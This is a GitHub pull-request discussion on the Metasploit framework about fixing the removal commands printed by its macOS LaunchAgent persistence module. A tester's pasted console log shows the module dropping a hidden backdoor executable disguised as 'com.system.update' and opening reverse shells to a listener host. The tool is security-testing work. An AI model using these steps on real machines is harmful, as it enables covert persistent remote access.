Update removal commands for osx/local/persistence #12871

phra · 2020-01-21T15:53:30Z

bcoles

Seems legit. LGTM

timwr · 2020-01-28T05:53:23Z

These changes look OK but I'm not having much success with this module on Mojave:

x64 isn't a payload option (not a blocker, but I suspect this is breaks Catalina: https://support.apple.com/en-vn/HT208436)
Permission errors (although it's possible/likely I broke something on my machine):

Users-iMac:~ user$ launchctl load /Users/user/Library/LaunchAgents/com.system.update.plist
/Users/user/Library/LaunchAgents/com.system.update.plist: Operation not permitted
Users-iMac:~ user$ launchctl load -w /Users/user/Library/LaunchAgents/com.system.update.plist
/Users/user/Library/LaunchAgents/com.system.update.plist: Operation not permitted
Users-iMac:~ user$ sudo launchctl load -w /Users/user/Library/LaunchAgents/com.system.update.plist
Password:
/Users/user/Library/LaunchAgents/com.system.update.plist: Path had bad ownership/permissions
Users-iMac:~ user$ sudo launchctl load /Users/user/Library/LaunchAgents/com.system.update.plist
/Users/user/Library/LaunchAgents/com.system.update.plist: Path had bad ownership/permissions

I'll merge this and fix 1., and hopefully figure out what's going on with 2.

timwr · 2020-01-28T06:16:16Z

Despite 2. the module still appears to work once I reboot 🤷‍♂️

phra · 2020-01-28T07:30:46Z

AFAIK the load command only loads immediately the script but the persistence is achieved by writing the .plist itself.

…ptions

timwr · 2020-01-28T09:47:30Z

Please see: 0b0d4c8

Added support for x64 payloads
The removal commands now also deletes the payload directory (not just the payload).
I added a launchctl remove that also deletes the plist from launchctl list (although I think rebooting also clears it).

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload osx/x86/shell_reverse_tcp
payload => osx/x86/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.13.37
LHOST => 192.168.13.37
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) >
[*] Started reverse TCP handler on 192.168.13.37:4444
[*] Command shell session 1 opened (192.168.13.37:4444 -> 192.168.133.37:49153) at 2020-01-28 17:34:28 +0800

msf5 exploit(multi/handler) > use exploit/osx/local/persistence
msf5 exploit(osx/local/persistence) > set payload osx/x86/shell_reverse_tcp
payload => osx/x86/shell_reverse_tcp
msf5 exploit(osx/local/persistence) > set LHOST 192.168.13.37
LHOST => 192.168.13.37
msf5 exploit(osx/local/persistence) > set LPORT 4444
LPORT => 4444
msf5 exploit(osx/local/persistence) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf5 exploit(osx/local/persistence) > set RUN_NOW true
RUN_NOW => true
msf5 exploit(osx/local/persistence) > set SESSION -1
SESSION => -1
msf5 exploit(osx/local/persistence) > run

[*] Dropping backdoor executable...
[+] Backdoor stored to /Users/user/Library/.vgzornHi/com.system.update
[+] LaunchAgent added: /Users/user/Library/LaunchAgents/com.system.update.plist
[+] LaunchAgent installed successfully.
[*] To remove the persistence, run:
rm -rf /Users/user/Library/.vgzornHi ; rm /Users/user/Library/LaunchAgents/com.system.update.plist ; launchctl remove com.system.update ; launchctl stop com.system.update

msf5 exploit(osx/local/persistence) > [*] Command shell session 2 opened (192.168.13.37:4444 -> 192.168.133.37:49154) at 2020-01-28 17:35:15 +0800

msf5 exploit(osx/local/persistence) > sessions 2
[*] Starting interaction with 2...

rm -rf /Users/user/Library/.vgzornHi ; rm /Users/user/Library/LaunchAgents/com.system.update.plist ; launchctl remove com.system.update ; launchctl stop com.system.update
[*] 192.168.133.37 - Command shell session 2 closed.
msf5 exploit(osx/local/persistence) > sessions 1
[*] Starting interaction with 1...

ls -ld /Users/user/Library/.*
drwx------@ 64 user  staff  2176 Jan 28 17:35 /Users/user/Library/.
drwxr-xr-x+ 87 user  staff  2958 Jan 28 16:19 /Users/user/Library/..
-rw-r--r--   1 user  staff     0 Mar  3  2018 /Users/user/Library/.localized
launchctl list | grep update
-       0       com.apple.softwareupdate_notify_agent
-       0       com.apple.appstoreupdateagent

Thanks @phra !!

tperry-r7 · 2020-02-04T20:19:10Z

Release Notes

Fixes module osx/local/persistence. Previously it suggested the wrong removal commands that prevented the deletion of the dropped executable.

update removal commands for osx/local/persistence

06843d0

fixes rapid7#12870

space-r7 added the bug label Jan 21, 2020

bcoles approved these changes Jan 25, 2020

View reviewed changes

timwr self-assigned this Jan 28, 2020

timwr added a commit that referenced this pull request Jan 28, 2020

Land #12871, fix osx/local/persistence removal commands and payload o…

d4bd195

…ptions

timwr merged commit 06843d0 into rapid7:master Jan 28, 2020

tperry-r7 added the rn-fix release notes fix label Feb 4, 2020

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Update removal commands for osx/local/persistence #12871

Update removal commands for osx/local/persistence #12871

phra commented Jan 21, 2020

bcoles left a comment

timwr commented Jan 28, 2020

timwr commented Jan 28, 2020

phra commented Jan 28, 2020

timwr commented Jan 28, 2020

tperry-r7 commented Feb 4, 2020

Update removal commands for osx/local/persistence #12871

Update removal commands for osx/local/persistence #12871

Conversation

phra commented Jan 21, 2020

bcoles left a comment

Choose a reason for hiding this comment

timwr commented Jan 28, 2020

timwr commented Jan 28, 2020

phra commented Jan 28, 2020

timwr commented Jan 28, 2020

tperry-r7 commented Feb 4, 2020

Release Notes